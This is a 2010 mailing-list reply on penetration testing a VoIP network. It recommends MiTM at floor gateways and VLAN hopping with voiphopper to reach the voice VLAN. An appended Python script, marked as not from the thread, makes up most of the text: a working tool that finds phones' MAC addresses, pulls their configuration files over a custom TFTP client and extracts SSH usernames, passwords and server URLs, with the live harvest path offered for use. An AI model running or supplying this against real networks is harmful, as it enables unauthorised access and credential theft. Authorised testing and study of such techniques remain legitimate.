mailing list archives
Re: pentesting voip network-please help
From: "Champ Clark III [Softwink]" <champ () softwink com>
Date: Wed, 3 Feb 2010 13:53:59 -0500
On Fri, Jan 29, 2010 at 01:14:04PM -0500, mzcohen2682 () aim com wrote:
> I started by trying to download the images files for the phones from
> the tftp server by doing a brute force attack for the names of the
Check to see if the phones have web services enabled. A lot of
times, they do. This will give you the MAC address of each phone,
which you can use to pull down the configuration files. I've simply
scanned the network for port 80 then 'wget' all the phone
configurations. From there, with a little shell scripting, you
can write a routine to pull all the configuration files via TFTP.
That's if they have the web services enabled. I'm assuming
they are using SCCP.
Once you have them all, use 'grep' to find the interesting
> after that... I tried to capture some RTP conversations but without any
> success. I am connected to the voip vlan and used wireshark but it
> doesn't detect any calls! Should I do some arp spoofing attack? but to
You'll need to MiTM it before you start seeing anything. I've
been at offices (multi-floor) that have default gateways for each floor.
That's the address I've MiTM'd.
> any other ideas how to continue with this pentest?
> what I see is that although the client didn't implement encryption or
> any other security control, just the vlan isn't so easy to pentest a
Nah. People often confuse VLAN == security. What I've done in
the past is get a valid MAC address of a phone and use voiphopper
(http://voiphopper.sourceforge.net) to "jump" to the VoIP VLAN.
Voiphopper can "masquerade" as a Cisco phone and with the MAC address the
network won't notice any difference.
Of course, it'll be your laptop masquerading. So once you're
on the network, it sorta just becomes a "standard" pen-test. MiTM,
looking for unpatched machines, etc..etc...
Hope this helps....
Champ Clark III | Softwink, Inc | 800-538-9357 x 101
GPG Key ID: 58A2A58F
Key fingerprint = 7734 2A1C 007D 581E BDF7 6AD5 0F1F 655F 58A2 A58F
If it wasn't for C, we'd be using BASI, PASAL and OBOL.
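The scan-for-port-80, read-the-MAC, pull-the-config-over-TFTP, grep-it loop Champ describes, written out as an added example. This is not from the thread and not Champ's own scripting; it assumes CallManager-style naming (a registered Cisco phone requests SEP<MAC>.cnf.xml, with XMLDefault.cnf.xml as the auto-registration fallback), a TFTP server on the standard port 69, and a host list you already built (e.g. from an nmap -p80 sweep of the voice VLAN). The phone page, the config, and the element names grepped for are constructed samples; grep far wider on a real target.

```python
#!/usr/bin/env python3
"""Phone-config harvest: web UI -> MAC -> TFTP config -> interesting fields.
Stdlib only; added example, not from the original thread."""
import re
import socket
import struct
import urllib.request

# Constructed sample of a phone status page; real pages vary by firmware.
SAMPLE_PHONE_PAGE = """<html><body><table>
<tr><td>MAC Address</td><td>00:1A:2B:3C:4D:5E</td></tr>
<tr><td>Host Name</td><td>SEP001A2B3C4D5E</td></tr>
</table></body></html>"""

# Constructed sample config in the SEP*.cnf.xml style (element set is an
# assumption for illustration).
SAMPLE_CONFIG = """<device>
<devicePool><callManagerGroup><members><member priority="0"><callManager>
<processNodeName>10.0.5.10</processNodeName></callManager></member></members>
</callManagerGroup></devicePool>
<authenticationURL>http://10.0.5.10:8080/ccmcip/authenticate.jsp</authenticationURL>
<sshUserId>admin</sshUserId>
<sshPassword>cisco</sshPassword>
</device>"""

MAC_RE = re.compile(r"MAC\s*Address.*?([0-9A-F]{2}(?:[:-]?[0-9A-F]{2}){5})",
                    re.I | re.S)


def extract_mac(html):
    """Return the MAC as 12 upper-case hex digits, or None if not found."""
    m = MAC_RE.search(html)
    return re.sub(r"[:-]", "", m.group(1)).upper() if m else None


def config_names(mac):
    """Files a CallManager-managed phone with this MAC pulls over TFTP."""
    return ["SEP%s.cnf.xml" % mac, "XMLDefault.cnf.xml"]


def build_rrq(filename, mode="octet"):
    """RFC 1350 read request: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", 1) + filename.encode() + b"\0" + mode.encode() + b"\0"


def tftp_get(server, filename, timeout=3.0):
    """Minimal TFTP read client. Raises OSError on ERROR packet or timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_rrq(filename), (server, 69))
    data, expected, tid = b"", 1, None
    while True:
        pkt, addr = sock.recvfrom(65536)
        tid = tid or addr                          # server replies from a new port
        (op,) = struct.unpack("!H", pkt[:2])
        if op == 5:                                # ERROR
            sock.close()
            raise OSError(pkt[4:].rstrip(b"\0").decode(errors="replace"))
        if op != 3:                                # only DATA carries payload
            continue
        (block,) = struct.unpack("!H", pkt[2:4])
        sock.sendto(struct.pack("!HH", 4, block), tid)   # ACK every DATA block
        if block != expected:
            continue                               # duplicate, already ACKed
        data += pkt[4:]
        expected = (expected + 1) & 0xFFFF
        if len(pkt) - 4 < 512:                     # short block ends the transfer
            sock.close()
            return data


# Tags worth reading first; an assumption, widen it on a real engagement.
INTERESTING = ("processNodeName", "authenticationURL", "directoryURL",
               "servicesURL", "loadInformation", "sshUserId", "sshPassword",
               "phonePassword")


def interesting_fields(xml_text):
    """The 'grep' step: pull the fields worth reading out of one config."""
    found = {}
    for tag in INTERESTING:
        m = re.search(r"<%s[^>]*>([^<]*)</%s>" % (tag, tag), xml_text)
        if m:
            found[tag] = m.group(1).strip()
    return found


def harvest(hosts, tftp_server, timeout=3.0):
    """Sweep phones with the web UI up and collect their configs' key fields."""
    results = {}
    for host in hosts:
        try:
            page = urllib.request.urlopen("http://%s/" % host, timeout=timeout).read()
        except OSError:
            continue                               # no web service on this phone
        mac = extract_mac(page.decode(errors="replace"))
        if not mac:
            continue
        for name in config_names(mac):
            try:
                cfg = tftp_get(tftp_server, name, timeout).decode(errors="replace")
                results[name] = interesting_fields(cfg)
            except OSError:
                pass                               # file absent or server quiet
    return results


if __name__ == "__main__":
    # Offline demo on the constructed samples; harvest() is what you run live.
    mac = extract_mac(SAMPLE_PHONE_PAGE)
    print(mac, config_names(mac))
    print(interesting_fields(SAMPLE_CONFIG))
```

The TFTP client deliberately ACKs every DATA packet, including duplicates, and records the server's transfer ID from the first reply; a phone config server that changes source port mid-transfer, or a laggy one resending block 1, will otherwise hang a naive client. Sample input is constructed, so the live path (`harvest`) is only exercised when you give it real hosts and a real TFTP server.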